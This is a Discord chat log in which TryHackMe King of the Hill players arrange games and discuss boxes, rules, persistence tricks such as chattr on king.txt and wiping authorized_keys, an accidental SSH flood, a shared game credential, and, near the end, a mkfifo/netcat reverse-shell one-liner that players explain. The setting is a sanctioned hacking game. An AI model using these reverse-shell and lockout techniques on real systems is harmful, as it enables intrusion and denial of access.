rEEEEE

https://tryhackme.com/games/koth/join/441b04065ab003317723e64b

Could just go for some oreos right now

don't worry i don't Byte...

Amazingly, they are somehow vegan

that's right

@steep raptor game startd in 3 mins if ur joinin

3min F

I'll be late in

dw

im lsow asf

and if i aint done the box before

then ill be even slower

@steep raptor i joining?

ninja is in

;p

imma bout to get slapped by both of u

gl

It says people need to be subscribed to play Koth but I see people in public games that are not how is that possible?

🟥 - Get Root, 🟩 - Get King, 🟨 - Get in via SSH, 🟦 - Get Shell, 🟪 - Unknown ??? ?????? ???? ??

🟪 Space Jam Room

🟪 Tyler Room

🟨 Shrek Room

🟨 🟩 Production Room

🟦 Food Room

my-progress.txt

production unknown for me

@rugged pumice Food has changed

It says people need to be subscribed to play Koth but I see people in public games that are not how is that possible
@runic river anyone can spectate games , but to play you need to be subscribed.

free to play weekends when 👀

No yesterday it let me play 2 koth for free for some reason

No yesterday it let me play 2 koth for free for some reason
@runic river that was a bug:)

free to play weekends when 👀
@full grove rumor has it this weekend.

@quiet schooner changed how :?

I got so confused on the Tyler room

That's the hardest box on koth

Shame you got that when playing:)

I guess xd

@rugged pumice I won't say

But I fixed some things that were broken

i i have no idea how to get root

ok

who broke the king.txt file 😄

not me lol

cant even get ot it

xD

someone just killed my script or soemshit

i was in as root

ffs

xD

not me

legit just killed my scipr

was about to get king

xD

or try

lol

script not working now

someone either patched it or broke it lol

If it can't read the king, whoever was the last king get the point I think?

is king.txt broke

??

i think so 😄

Yep

ffs

i cant get it ;/

neither

So I'm stuck as king basically

yep

is anyone root?

yh

me

i just tried

to cahnge king

but its broke

can u delete king.txt and make a enw one??

or against rules??

is someone hard spamming it ?

not me

You can delete and remake but it won't work

its legit broke

I'm not clearing it

ninja u are stuck as king

xD

Yep

reset bois

;d

everyone reset

xD

if it resets, no 1 is getting root 😉

WHYS THAT ;P

caps

🙂

i'll try my best to prevent it

i have the script ready mate

xD

im a noob tho

i dont even know the command to write in king.txt so i gotts BI it

VI

can we reset?

It's reset

is it up now

or is it turnin back on

reset time?

it ahs reset

it got reset ye

is it turnin back on or sopmethin

cause i aint gettin any conection

me neither

oof

u got a connection yet??

yikes ;/

@rugged pumice is it off for u to?

i cant ssh, well, its asking for a pass ;/

inot even asking me for a pass

cant even ftp

i can

i cant 😦

might have to reset my VM

reset the room again ;/

yh

You only get one reset IIRC?

Or that got fixed

yeha I got it

im restarting my vm

this is a big oof

whoever broke king

grrr

@void rivet It's not broken

yh ik

i meant before

askin me for password

password is NOT password

what if it is

no idea

legit askin me for a password

why is ssh asking for password when I have the id_rsa ;/

i chmod the id_rsa

same

truu

Chances are

Someone deleted the authorized_keys file

on the server

ooooooof

playin dirty

Nah, all part of the game

no way ninja got in that fast ;/

The trick is maintaining persistence

yh, i wouldbve got in if i didnt have to reset my vm

Especially in a way that no one expects, because otherwise they can counter it

Remember that root is God. Unless you can pull someone away from being root, that's you done for

@rugged pumice looks like were locked out xD

gg

if you have a reverse_shell in the machine and reset it, do it delete the reverse_shell?

yea :d

Yes

Passwords were changed, keys were revoked

big f for me

Ninja

u

saucy

mofo

ninja how did you get in so fast after the reset lol

lucky i had to reset my VM xD

was fun tho

gg guys

am still gonna come 3rd ;/

guess thats good

@rugged pumice Keys

Then I wiped them from the box and changed passwords

ur saucy

i was gonna do the same thing

xD

i don't even know how to do that lol ;ddd

Fastest root in the west

Legit had my script at the ready but had to reset my VM

so far , I have not been able to get root on any machine

think ive rooted this and shrek befrore

thats it

i like shrek

whoever made that

@rugged pumice You can root Food without too much trouble

Shrek is a good box

yh

my freidn was guessing the password for 30mins

i got it in 5min

kinda a giveaway

@quiet schooner I just found a way to get shell on Food, but didn't have time to try other things ;d

REEEallly

that's the pw

@quiet schooner

NICE

@steep raptor lmao

ati mean

atleast i got 3rd

and am a big noob

;p

@steep raptor Yep, that's the one I used yesterday too

ninja, is the pass for ssh brute-forcable ?

maybe

i just cracked that hashes of it all

REEEEE

@steep raptor Have fun

@steep raptor Not any more btw

😐 weirdChamp

oooof

Oreo

takin king

go on lad

@steep raptor DM me, I have a question

yea, friend you ninja 😛

ninjas question is how did u get king

xD

rush king and locked us out

No it's a serious question

lol

lol

join KOTH-1 would love to hear what you have to say

aye good news everybody, my autopwn script broke somehow

😂

good

good thing I'm too lazy to fix it

I haven't ever used it lmao

haha

I made it in a private game for fun

yh

Find it ruins the fun if you just auto pwn to root

what so u ran the script and u got king??

thats just mad

yeah the script for shrek would do the following

Gain persistence and harden Donkey while providing a callback as root. Was aiming to get it so that it would generate root ssh keys and overwrite /etc/ssh/sshd_config to allow root sign in  

thats just OP

But yeah given up on that now as it was fun but ruined it completely

yh

whenever i see u or dan in a lobby i just leave xD

cause no point me bein there

Had it as a two part script in which I run one and it pulls my harden script which then removes sudoers, replaces ls, cat, echo and sudo with terminal parrot. Plants terminal parrot within users $PATH and then adds it to their bashrc

I need to get terminal parrot

Tbh I only know shrek and space jam

i like shrek

I've done food once and did alright but never took any notes, production and tyler I've only had once

can't get root on tyler

@lusty portal can u add the titles to the boxes so we can see which one it is

@dapper escarp think ive only got root on food and shrek

im kinda new to all this

so im kinda slow

Tyler is another level of weird

havent tried it

I won tyler with a single flag

I know people that got a shell

I did not

I gained user shell on two users, but the priv esc was just not having any of it

managed to get an autopwn for both but they're pretty useless

https://tryhackme.com/games/koth/join/3e6092a66249db92bd02bd57

how long till start?

12min

Damn I just joined by accident

ignore me

I wanted to spectate

@void rivet

@neon sleet ???

i gave up ages ago

never done tyler and i couldnt get it working

I just clicked the link

oh lol

and it auto-joined me

ooooffff

gg wp

gg

@void rivet I submitted a flag, I saw there was a few minutes left so figured I'd see what I'd find 🤣

XD

I really want to do that room though

Seems like a lot of fun, but I need some time for sure.

im new to all this so i only just learned how to make a php shell to a jpg

im a newb

Man kudos to you

Yeah that's actually pretty impressive!

takes some doing jumping into a koth style game mode and using it to learn

yh man

i came 3rd the game before

out of 5 or 6

was completely out of my depth on this one though

the privesc on that box is tough

or at least wasnt obvious

if one of the other holes are patched

I've heard about it, didn't experience it yet.

@dapper escarp @weary kindle can I pm you?

👀

Go nuts

@dapper escarp do u recommend i do the rooms

and learn abit

and then come back to KOTH?

yes!
i've done a whole learning path and i'm still struggling ;/ ;d

there is a lot to learn

im not doing that bad tbh

truuu

i mean i got root on the other one we did

idk the name of it

It's not a bad idea tbh, the worst case scenario is you learn something

true

win win in my opinion

i like to go against people that are either at same level as me or just a bit beter

Hopefuly there will be a ranked system for it eventually at some point

cause if i go against someone like u just takes the motivation out of me cause ik i wont win lol

if it picks up a bit of speed

ur acc insane

i watched ur stream

aha I wish, I have a long way to go and also have the issue of now people expect me to perform 😂

true xD

to me ur insane

cause im still new

You'll ge tthere man, I have no doubt you'll be over taking me in no time!

You're certainly in the right place

I think I may make a couple of youtube videos once this set retires properly on my strategies once I got into the box to harden it

yh man, thanks, imma start going through the rooms tomorrow

No more tyler

Tyler is a sick box

if all koth boxes were like that

I'd lose every game

what's wrong with tyler ;/

It's hard

opsss, can;t give hints

Yeah Tyler is that nice kind of brutal in which everyone has a chance

until one person cracks it I feel

@rugged pumice If you rooted it, you're doing better than everyone else

^^^^

no way lol

are you doing it rn?

For the third time in a row

Think I might do a couple of privates tomorrow and try fiddle with tyler

send invite lol

it takes 5 mins max

I seem to just keep getting shrek

it's cursed

It's like karma for making my script/one liners

@dapper escarp We got root baby

ayeee

please tell me it wasn't with the vim binary

Nope

hmm I gotta look at that box

It's the only box I use my autopwn on and that's only to jump into user shells

note I don't submit flags when I use them

You may see me in public games with 0 points as I work on finding alternative methods into boxes

ninja can't join because it's already running, so i'm being put into other rooms

Prod was a really fun box

@fair adder might have got blood on root on Tyler

I think Dan rooted it last time I played with him

but kudos that box wassomething else

geeeeow

was not easy

did you brute-force your way in? ;d

erm

at the risk of spoilers ill have to defer my question :P

f

although im happy to give gentle pushes in the right direction

if that's allowed

there's multiple ways to skin this cat

😉 🔨 🔀 🧰

slam face into keyboard == root

you DIDNT get root like that @dapper escarp

????

👌 ⛈️ 🌪️ 🔥 ▶️

I haven't rooted tyler

so that method is flawed

keyboard != root

faceroll keyboard == root

trust

brb just gunna brute force a root pw

i meannnnnnnnnnnnnnnnnnn

I have rooted Tyler, got it on my first game. I agree with optional, really good box

i thought it was great as well

https://tryhackme.com/games/koth/join/d9b670246a5559c9ac302f6c

@pale mango here

i comming 🙂

my network is laggy

Vir sec con ctf @cobalt jackal

@nova prawn i don't have Mic 😄

ah ok xd

@steep raptor Hi , No mic

https://tryhackme.com/games/koth/join/d61b6b6dd7fcfdbfb2273fc9

anyone who streams koth time to time except 0ptional?

Sherlock Sec

https://www.twitch.tv/sherlocksec

yep 🙂

I'm sure there's more, check the TryHackMe section on twitch from time to time

Morning bois

Anyone up for a koth?

@lusty portal can u make it so we can see what box we are going to be doing while it's counting down?

Its chosen 1 minute before starting

Ahh ok

I can make it show once the game has started?

Yh

Please

im ready 🙂

Alright I'm just gonna get out of bed and throw some water on my face 😂😂

hahaa 🙂

@void rivet Can I join as well?

@gusty cradle where ?

He has not sent the link yet

Yh sure

he wants go to sleep

No I just woke up

Aha

oh good 🙂

Judt going to grt in thr shower and il be ready

private room ?

Probably public

Do points earned on koth go onto ur points on ur account?

No

Alright

Ready guys ?

I'm ready

Almost

Went to bed at 5am

So got up late today

Turning pc on now

bootin up vm

anyone else joining VC??

I can join

yh ok

I hope we get Shrek

lol

i dont

cause i only know 1 way to get the file i need

and i dont have that setup now

Start the match and post the invite link here

bout to now

https://tryhackme.com/games/koth/join/ddf966d0cc73f2ccf0a90696

i want a box i havent done before

no point doing the same box over ad over again

Its random ^

2 more boxes incoming next week

yesssss

Skidy u wanna join in on this ? ;p

https://tryhackme.com/games/koth/join/ddf966d0cc73f2ccf0a90696

Skidy u wanna join in on this ? ;p
@void rivet Fixing Path loading speed atm

So will pass

I will play on the new boxes mind

alright

@distant zealot https://tryhackme.com/games/koth/join/ddf966d0cc73f2ccf0a90696

I will play on the new boxes mind
@lusty portal Skiddy playing! what?

glhf

my vpn is fuckin up oof

imma be a bit late there lol

my subscribe dead today Hahaa

ooof

resarrting my vm

inconvenience

very cheeky

did someone break the ssh??

big f

why does my vpn always fuck up so im always late xD

Yeah, someone broke ssh

ooof

tarasz 100%

looks like me and u are locket out

yh

me 2

@jolly parcel Dude, stop it! You're spamming ssh

reset box xD

he wont

but i have alt 1 sec 😄

oh shit yh

haha

ohh ;d

sorry, ran by mistake all scripts from file

Don't do it again

can anyone connect yet??

everytime the box resets i have to restart my vm cause i get no connection

;/ again

again what??

you have to restart your vm

yh

its annoying

still cant connect

grrrr

the box is very low, and it disconnected me

who is spamming scripts lol

tara i bet lol

just says connection timed out for me

cant connect

ooof

box is ok

what is not working?

my connection is fucked

re-gend a new vpn

restarted vpn

not working

big f for me

anyone else doing a box rn

send me an inv

hard f, tarasz locked it down i think ;d

i never got a chanvce to get in

cause i couldnt connect

tarasz have u got an auto script??

just checked again, initial path to get to root works okay

or maybe no 🙂

did you ran some kind of script cuz when i got it, it was very laggy ;/

dude, I am playing this second day, I haven't got a time to create some auto scripts

for machine

just a few to get persistence

did you ran some kind of script cuz when i got it, it was very laggy ;/
@rugged pumice nothing besides cronjobs

• • • • ?

I am still new here, so maybe I missed some rules. It is allowed to patch found vulnerabilities, right?

• • • • ?
        @rugged pumice yeah, 1 cronjob

the box is so laggy 😄

Why does it return segfault

i shutdown my vm completely

regend my vpn

cant connect

think the box just dont like me rn

cpu 100%, ram 100%, disk 100% 😄

jeeeez

whos doin that??

i has to be 1 or 2 of the above

because even the web server can;t load

so something is draining resources

i cant connect to ftp or ssh

tru, it hangs ;d

1 more restart :?

where do you see cpu 100%???

Don't restart

no i'm not seeing it, but there has to be something running at 100%

nothing load

it just hangs

i will l not restart, sorry, i checked all ports and it works okay

if u didnt flood the ssh first we wouldnt have had to restart in the first place ;p

is ssh flood disallowed in rules? I can't see it

no

well im not sure

just a point

isn't flooding == dos :?

O_o

well, okay, maybe. I ran it by mistake in a loop. now i don't

I can confirm that machine is rootable now as I didn't patched all services. I am not sure If it is allowed

you sure you stopped it ;/

it is allowed to patch

still hangs ;E

Use ftp

Telnet sucks

there are multiple ways to root this box

no im testing if the service is running

telnet wasn't working for me from the start, idk what's the problem

i'm not using telnet to connect, just to test if the service is running

who is 10.11.0.11 ?

Me, why?

Stop killing my shell

new 1
https://tryhackme.com/games/koth/join/bfe14e6d1c2bc184c1acf403
5 minuts

I believe, it is allowed

Stop killing my shell
@gusty cradle

😏

I already have another shell

😮

You would be correct. Shell killing is 100% allowed

i will switch now to another game so you have a chance to get root:)

vpn isnt working again

why tf

worked yesterday fine

i've never played this 1 😮

me too

what one is it

michael jordan :?

ah

me three

ive seen this one

never done it though

how u get king that quick?

u done this before?

weirdChamp ;d

no way its that easy

lol it was easy 🙂

keep trying, I will patch it soon

legit have no idea with this one

@weary kindle can i pm you?

What's broke on prod now

Yeah sure, shoot away

no idea how to do this one

Is it supposed to return segfault?

what returns segfault?

I'll pm you

@jolly parcel have u patched it yet??

or cna i just not find it lol

there are few ways to get in

some are patched by now

few ways :D
i can't even find 1 ;ddd

can u brute force password for ssh?

@jolly parcel Good game, guess I'll have to settle for second position

i got so happy when i found a /flag/ extension

but notrhin is there

tara

i checked a port

and found ur name

;p

oops

hehe

so u patched that port yh??

im guessing it had somethin on it

like a password or somethin

u just kicked me out xD

@rugged pumice hes patched it all

I believe, rules page is to small. If patching is allowed what is considered as patching? rotating keys, removing functionality, stopping services. There are no clear description what services should work and how

nah man its all allowed i belive

just letting him know u have patched all of them

Not everything is allowed

rlly??

You're not allowed to attack other people

You're not allowed to delete flags

oh yh obvs

You can not use iptables to block all connections except yours

In terms of patching stuff, you're not allowed to just blanket restrict everything ^^

Port 9999 must stay up

I wanted to do that so badly 😢

But other than that, enjoy

so I can just stop all other services? rly?

So can we delete things that are needed for foothold?

Yeah, that may or may not have been my suggestion when Koth was suggested. Hence it being banned

I believe so, yes

That's just good patching

👀 I'll block ssh next time

It's why there are so many footholds -- to make it unlikely that you can patch them all

lol

Just remember that if you turn off all services, you're gonna kill your own connection too

Gotta be smart about it

Nah, I'll upload my keys to authorized_keys modify ssh service and boom

but nothing stops me from allowing ssh only for root with my key

Modify? That'd do it (unless someone else is already in and overwrites your key before you finish modifying)

Probably best to setup more persistence than that, but yes

I have a script that enters my name into king.txt every minute

Every minute? Try 100 times a second 🤣

xD

😄

I have a lovely one liner to constantly do that, whilst simultaneously keeping anyone else from modifying the file at all

chattr?

I use chattr on my script

so technically ssh flood is allowed? that's just the same as turning off ssh

Yeah, but more complicated than that

@void rivet are services slow for you?

yh

Just using chattr is easy for everyone to use

Not everyone is familiar with chattr and it's easy to reverse

i feel like every box that tar is in becomes very slow

😄

Precisely

yep

xD

Is SSH flooding allowed?

With the oneliner I've got up my sleeve? It's significantly harder to reverse...

flooding == dos, i hope 'not'

@terse willow Me want!

I'm gonna go create that

Is SSH flooding allowed?
@gusty cradle I would imagine not, to be honest, just in case you DOS the thing

How about spamming others users input?

I mean, JH did do that during the stream

That one is allowed 😁

Absolute pain in the rear end

nasty nasty, but the good kind

Oh, yes! Now to find a binary file to spam

/*

I've almost got a script to do that which will be unbeatable, and leave me a nice loophole to never affect myself

Just doesn't quite work yet 😆

does it filter out the input, or does it not send to yourself?

what is the actual room name that has port 80 -> Michael Jordan

Spacejam

probably space jam

It sends it to any tty owned by a connection from an IP that isn't my own @rigid raptor

it is spacejam

So if we somehow spoof your ip?

Right, so avoiding. I was wondering if you were being clever somehow. Probably best to keep it simple

Good luck with that -- the VPN will throw a fit, but yeah, theoretically

😆 exactly

spoofing ips work better if you've got control of something between the two endpoints. And since you're not allowed to attack the other players, that's going to be difficult

^^

I mean, it would be pretty fun to have a router or switch in the loop

Only easy way to do it would be by nicking my config file, which a) ain't allowed, b) would be very difficult and c) would throw the VPN into a hissy fit

yeah, cause two connected at the same time

@terse willow Can I PM you? I think I got a nasty defence tactic in mind, but I'm not sure if it's a little too nasty. But if it isn't, I'd rather not give it away just yet :p

@terse willow Are we allowed to create fake flags to confuse people?

lmao

😆

@rigid raptor go for it

@gusty cradle I've heard that before. No reason why not!

I'm gonna go create a fake flag generator 😏

Thank god I saved some flags!

I'm gonna create fake ones based on that

@lusty portal Can I PM you? Muri asked me to divert a rule decision to you. It's regarding an idea to keep other players out once you get in, but we can't decide if it's a bit too evil :p

👀

@lusty portal Can I PM you? Muri asked me to divert a rule decision to you. It's regarding an idea to keep other players out once you get in, but we can't decide if it's a bit too evil :p
@rigid raptor yeah sure

https://tryhackme.com/games/koth/join/528493b9fe3e910a43f9abb2

@gusty cradle please dont use ur flag gen on me rn xD

@gusty cradle do it

No promises 😆

noooooo

have u made it??

😏

xD

RIP me

my vpn broke again

lol

this is weird

u got a 4 min headstart now

why does this always happen xD

Keep it PG13 @void rivet 🙂

ah sorry

my reverse shell isnt working big ooof

"oof" shouldn't be allowed in PG13, i swear

We got tyler 😢

its annoying as

hell

as annoying as hall

@gusty cradle we are not having any luck are we

I got some creds

F for me

Got shell

Got Milk?

im trying but it aint workin for me lol

i am joining

no

dont

every box ur on runs slow

KoTH machines shouldn't run slow?

they did earlier

If a specific machine does run slow, I can bump its resources.

Which machine?

there was 2

Tyler

one was food

idk the other one

If anyone else reports this I will bump the resources

666 had the same issue aswell

@rugged pumice

with the same boxes

for me it worked ok, don't know what was the problem for you

was slow for all of us except u

O_o

You guys using the IP VPN too?

yh

using everything we need to

How many flags are there on Tyler?

my shell doesnt wanna work for some reason lol

you can hover over the flag icon and it tells you

On the flag submission box

theres 6

ive heard tyler is quite hard

Its the hardest KoTH box

especially when it doesnt work with my shell lol

ah

makes sense now

hey guys any tryhackme mod/support than can answer a question about the new koth stuff?

I mean probably

@quiet schooner can i dm u

I mean I would argue you shouldn't need to

But I guess you can

tyler is hard

jeez

i legit give up

xD

Ill give you a hint

Which part are you on?

nahhh i dont want a hint aha

Okie:)

wanna find it myself otherwise feel like ive cheated

ik how to get it

but my shell isnt working

I have root but not user

@quiet schooner Same

I can't find anything

no spoilers

ohh sorry

Maybe

yh mine aint working ive done something wrong

@quiet schooner I think it's a container or something

is it like a docker?

Can't say

ahhh ok

well....8mins left

imma go and get a drink

then do another box

xD

Whoever made Tyler is very evil 😢 I have root but I can't find user

Ohhhh

I know what you've done

hehehe

Also prod was really nice

Thanks Dan

|| You've been honeypotted, you don't have root. || Spoiler, but it's worth it for your sanity

np

Noooooooooooooooooo!

I do actually have root tho

Right, I'm gonna hop into my VM and play a few games

https://tryhackme.com/games/koth/join/23d87cc31cbd49275a3f2ac7

@weary kindle hit that stream up

effort tho

https://tryhackme.com/games/koth/join/c04820a73fcda2e10393b2ec in 5 minutes

Always fun watching you guys stream

couldn't be bothered to wait 20 minutes

@lusty portal are we able to leave when it has already started

??

nope

oooof

ok

how we can see stream ? @stable narwhal

Oh Dan is sharing his screen

Optional and myself will also be streaming throughout the day, just we're on twitch typically

https://tryhackme.com/games/koth/join/c40345fe161528c59716c32d

@distant zealot, follow optional or Sherlock on Twitch

Just gonna leave me out there? ;P @stable narwhal

Soz @mellow bough 😢 didn't mean to haha

haha all good

Follow DarkStar/TryHackMe on Twitch too 😉

but all of the above first

Follow dark for tutorials on how to be defeated by an almighty zip file

As seen on agent sudo last night

optional, are you still streaming UoP stuff today?

Sorry man, something came up today so won’t be able to

@mellow bough guilty!

all good, Dan shot me a DM about it

Just don't do it again, kay?

Are 'myalt' or 'stivanradev' in the Discord?

both are me

Oh right, out of interest why lol?

You have (and are paying for) 2 accounts

KOTH requires 2 players in lobby.
so having 2 accounts allows me to play privately
without rushing for points,etc

also I can test my blue skills

Oh right, ok:)

How did you hear about THM?

ohh
JohnHammond made a youtube video about it

Shouldn't this be removed by now?

Oh no, we're still in beta. This is a public release of the beta, the rules/game is still subject to some change

Oh, okay, what about the second part? Pretty much anyone that's subscribed can create a game

Oh the only restriction is that it won't let you join depending on the experience level you have selected on your profile I think

Thank you for telling me, by the way you guys have a great platform, and the community here is really friendly, keep up the good work!

You're welcome and thanks!

https://tryhackme.com/games/koth/join/63931a78b7e266f144d02ce4 ~9 minutes

will hop in!

welp, what box is this?

@rugged pumice can i get spectater link pls

you can join here 1 min

https://tryhackme.com/games/koth/join/72ece55dc2cd0f8e09a1bab7

or watch https://tryhackme.com/games/koth/169

nah i cant ive got people round atm

thanks

what box is it

I feel as Paradox, you and I have to duel at some point @void rivet

im new to all this dude theres no point u will win xD

The victory means nothing

It would be a duel based purely on names

alright xD

can later if u want ?

Not right now

But we'll discuss this agin

hehe

i will put respek on my name

xD

bastards killing my shells

LOL

Hahah

@rugged pumice what box u on

I just learned who how on the twitch channel @fair adder

😛

errr how*

WOOOOW

this guy

@dapper escarp no worries! More just something to watch to pass time aha

@fair adder howww

you got back

:D

ill tell ya after this game

I stopped you now, for sure?

we'll see

https://tryhackme.com/games/koth/169 @void rivet

Should be up tomorrow. Gunna do some pwk then stream in the evening I think

oh wow

How did you...

omg

lol

@vagrant monolith What?

@fair adder keeps on fighting back and I have no idea how

@vagrant monolith Did you use chattr?

Yes

yes he did

Did you uninstall the package

he did not

Haha

OH

Then why does chattr not work anymore?

i got the same problem two days before

and it randomly started to work

lololol

was it that food box?

i know what he did

@fair adder Tell me

😏

Somehow @fair adder still manages to change the file some times

He can not fight both of us

wooooooooooow

There is a way to reverse chattr permissions but its not working right now

two minutes left lol

gg wp

you to!

Goed gedaan tom

🙂

GG

Bedankt! Love this game mode

yeah it's a lot of fun

will you play another one?

im down as long as @vagrant monolith doesnt grief me the whole time LOL

Hahaha

jk

I need to go to sleep

name of the game

Good luck!

join public if you're game

https://tryhackme.com/games/koth/172

@ember agate May I join?

https://tryhackme.com/games/koth/join/3d44ca814ccf0ae775e300a1

@ember agate @nova prawn @fair adder join voice channel

we're up here

if you wanna move up

oh lol

well

yeah

@ember agate join voice?

voice

https://tryhackme.com/games/koth/join/b10c621ef66bb2401e398f4f

@steep raptor You're loving these KoTH games:)

don't encourage him

❤️

@lusty portal smash mode learning

there are two more slots in public

well hello there OreoByte

xD

hello once again @void rivet

;*

lets hope my vpn doesnt end itself

like its been doing all day

glhf

thats the only box idk how to do

echo "oldpass\nNewPass\nNewPass\n" | passwd

<newpassword> would be a pretty good password

using burpsuite how can i look at incoming pings/traffic?

if im allowed to ask

if im not allowed to ask then sorry

whatcha mean

i dont think u can tell me because its something to do withna box

You'd have to route incoming traffic through burp, which takes a little more work that telling the browser to proxy through burp, and I don't know if burp allows that sort of shenanigance in the first place. You should just use a different tool for incoming traffic. If nothing else, tcpdump

im on james box

and its annoying

xD

@void rivet You enjoying the patch?

https://tenor.com/view/hopeless-disappointed-ryan-reynolds-facepalm-embarrassed-gif-5436796

https://tenor.com/view/sad-baby-frown-gif-4649018

im stuck

lol

legit no idea where to go from here

hehehe

pasta:123123123

guessin pasta is a user

it's always u:p

idk what 123123123 is though

xD

@void rivet user:pass

that aint the pass just tried it

123123123

kek you either mistyped it or someone changed it from when suitguy set it, or he was trolling

O_o

says permission denied lol

been locked out aint i

xD

or its wrong

@meager cloak ur mean, thought i was bout to get somewhere xD

It's 100% the password for pasta ssh

someone must have locked it then

but no one has a flag yet

so idk

oof

ssh pasta@10.10.142.159

123123123

wow

i mustve spelled somethin wrong

rip me

mknod "/dev/shm/.pipe" p; cat "/dev/shm/.pipe" | /bin/bash -i 2>&1 | nc 127.0.0.1 12345 >"dev/shm/.pipe"

legit im so stupid lol

whats that ^^??

ohhhh

any difference between mknod p and mkfifo?

mkfifo is mknod <file> p

mknod is a named pipe

Figured, but wanted to make sure

can u explain that to me cause i dont wanna just use it withoput knowing what it does, wanna learn aha

man mknod

D'you know what a FIFO is @void rivet?

nope

Have you used a pipe command before?

it's basically just | but instead of the symbol it's a file

oh ok

That ^^
It's a file that has an input and an output. You can't read from it unless something is being written out, and vice versa

and no i havent, im new to all this and trying to learn from doing koth's

That makes it really good for reverse shells

because the data has to go in a loop a | b | c | a

The command up there is making a FIFO (First I*n First Out). It's then taking the output of the file and putting it into an interactive bash shell

The shell is being sent using netcat

Isn't it first in first out?

Because buffer?